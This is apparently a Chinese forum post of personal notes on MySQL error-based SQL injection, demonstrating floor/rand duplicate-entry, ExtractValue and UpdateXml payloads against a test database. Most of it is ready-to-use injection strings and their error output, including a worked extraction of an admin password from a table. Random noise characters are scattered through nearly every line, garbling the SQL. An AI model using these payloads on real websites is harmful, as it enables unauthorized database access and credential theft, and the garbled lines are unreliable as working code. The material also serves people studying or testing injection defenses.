放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
F }! n8 @! \1 d. @实际测试环境:' \; a0 L! K/ K$ u: x
, T* H6 |7 {( X# B; M; K( A
2 f+ `/ W3 g5 G/ A6 n d
mysql> show tables;4 P n8 L3 d3 K, n. p. v
+----------------+% U: N8 V/ m r
| Tables_in_test |
. J8 x* o, |$ o! e" E0 y5 [2 J+----------------+
8 P) K. B. m' l# f( A8 k+ N8 H| admin |
" T" i) h' Z, n! O5 q| article |
% b. |: Z7 L; y+ v+----------------+
% z$ Z4 E, O. V2 l
- L8 g y7 }: ^6 C. n ( Y2 y/ `7 `3 D! J
+ F4 Q: y5 F `; Z
mysql> describe admin;, Y9 r H8 q9 T6 }
+-------+------------------+------+-----+---------+----------------+
1 ^7 p* \) B, T( h4 _4 F| Field | Type | Null | Key | Default | Extra |
; O& @: I2 O* ]' \+ w" x+-------+------------------+------+-----+---------+----------------+' Y, f& Z1 Z, {
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
0 o) J) s8 [* b( `, _; l| user | varchar(50) | NO | | NULL | |
% Z: S+ C: s8 O, f! g! `) V6 c| pass | varchar(50) | NO | | NULL | |
* ?! u/ w8 P+ l+-------+------------------+------+-----+---------+----------------+
' |/ r, q* Q2 b* U7 \" ^+ r; O/ _ 3 _7 k& E& @2 y+ _0 w- `
6 z Z6 ~" M5 P( q( o 9 L5 V, S3 O& J- W
mysql> describe article;, t: a" s3 K, A; ~. L9 a- a1 h
+---------+------------------+------+-----+---------+----------------+
1 T* ?4 z1 B8 P/ C# b| Field | Type | Null | Key | Default | Extra | \4 H1 w+ f- }/ \+ j
+---------+------------------+------+-----+---------+----------------+
/ ^8 Z3 x& J* t& v+ D$ P5 ^# q| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. N9 a6 L$ z/ f1 s- K
| title | varchar(50) | NO | | NULL | |
2 d1 } G' }) |# C! K( `2 w| content | varchar(50) | NO | | NULL | |
% O! ]% \. {% H8 i3 U% g+---------+------------------+------+-----+---------+----------------+
' Q; \# H v4 G, L1、通过floor报错
6 j) `5 x) f3 k9 A, B可以通过如下一些利用代码
3 E- F ~ r; K. t* j4 C5 Q 4 W! y" s* R5 _
+ G$ W5 ~3 ?6 S! v! I/ ?* h8 H$ [$ Tand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x& Y2 x/ n6 S; s
from information_schema.tables group by x)a);* Q# `) O6 k9 V. Q, K1 f% C
& i- k2 g7 P# ]. X5 s! d 9 a# B; i3 Z$ X5 ^ u& v2 r+ y2 L
and (select count(*) from (select 1 union select null union select !1)x
9 Y `7 B! b" K9 `1 g4 n. `group by concat((select table_name from information_schema.tables limit 1),4 q, g" ~7 S9 e( t& \( \
floor(rand(0)*2)));6 j( Q! o3 p7 Z
举例如下:+ z) ^ b. x, o8 \4 q7 _- @( I
首先进行正常查询:
! W; y5 ]$ b/ M# x. z " n! F% s7 M% ] a# c
mysql> select * from article where id = 1;$ N9 U& B2 C+ Z) M9 g; y7 c t3 S
+----+-------+---------+
; m, @# {# X$ I3 ~6 Y- @5 K4 ?| id | title | content |, {$ g6 i- Q+ n3 _! ^8 t1 ]
+----+-------+---------+" p% k: ^) o1 l
| 1 | test | do it |: q- g/ _$ C) g9 y- i8 x9 u9 Z. G
+----+-------+---------+1 e, `! T( {4 ?1 m
假如id输入存在注入的话,可以通过如下语句进行报错。$ B4 u6 m3 {" {1 d0 I
4 P4 B* q( o* l4 I, P2 B: |- D* e ' F; V+ u5 `+ c/ K9 b
mysql> select * from article where id = 1 and (select 1 from) E/ Q! x0 ?- r
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
: {+ V- n: i% ?. NERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
6 q6 H+ I Z2 Q( B/ G: O可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
0 s$ B0 l! n6 E) h* ?* S例如我们需要查询管理员用户名和密码:( W' g0 K) ]* C
Method1: q x5 x. N0 A. z% b# v2 z
) l5 x" @$ W, S0 `0 P
2 l0 k1 K" v2 z @/ p2 q; v. Emysql> select * from article where id = 1 and (select 1 from! o$ a7 W* V5 h& |# x; Z
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
2 i# f Z. c, P+ Efrom information_schema.tables group by x)a);
' `) g; z" c- b( s- {) J- IERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2 Y6 K2 z; L0 r% L4 r" n, D3 Y9 qMethod2:
" T1 E& |# F6 h& K- T9 @7 v6 ?
+ N& Y1 j* h9 l " f6 M" ~& ]# ]" L3 ]" j/ }0 |
mysql> select * from article where id = 1 and (select count(*)
5 J, Z6 O/ p. {3 \from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),- G) E1 Y B& P: d/ ?% P# O+ V6 W, S
floor(rand(0)*2)));5 @8 h7 s; W9 m
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'6 L2 b9 e9 s9 E. O: d1 @
2、ExtractValue6 T \' K- `5 ]+ V
测试语句如下
- e2 ~; B% g# t% X, E6 _ - n1 G. P% B9 F8 n1 e
1 |1 b: Q$ X8 E
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); y. f+ T% w" j" P4 u" M& l1 K
实际测试过程& a5 i1 N" [( `) h2 A# ~" |3 a/ I
+ q8 u) ^# y* G8 r
; B/ ]' U! K/ a4 q. q/ Lmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
7 ~8 P# s/ [9 J) k% o(select pass from admin limit 1)));--
3 I" D2 L" I' X' J! TERROR 1105 (HY000): XPATH syntax error: '\admin888'
, o% M" T. S. P0 U9 O; Y3、UpdateXml
! Y1 ?+ n8 h/ F3 |测试语句
& U. b" E( c U$ C; U* q/ f " g- T" M- W1 C
, r2 Y* ~/ Q- Z
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
/ U1 }& V+ \' }实际测试过程/ J8 ?2 j" L" V0 l/ v: s& |
$ S# b8 i; e- a! V6 W$ H
% k7 b. ~" ]$ P6 amysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,# t+ u: o0 L/ M+ g
(select pass from admin limit 1),0x5e24),1));) ]$ e" [: l1 y; m' F: _4 b
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
( b3 ?7 L- G6 _+ e3 _% k2 |6 nAll, thanks foreign guys.
5 r7 k) ^0 D* q4 z# R% P
2 [- E7 W3 ], P4 D# _/ u
: W! s2 d- A6 u$ s1 C+ e |
发表于 2012-12-10 10:28:51
收藏
支持
反对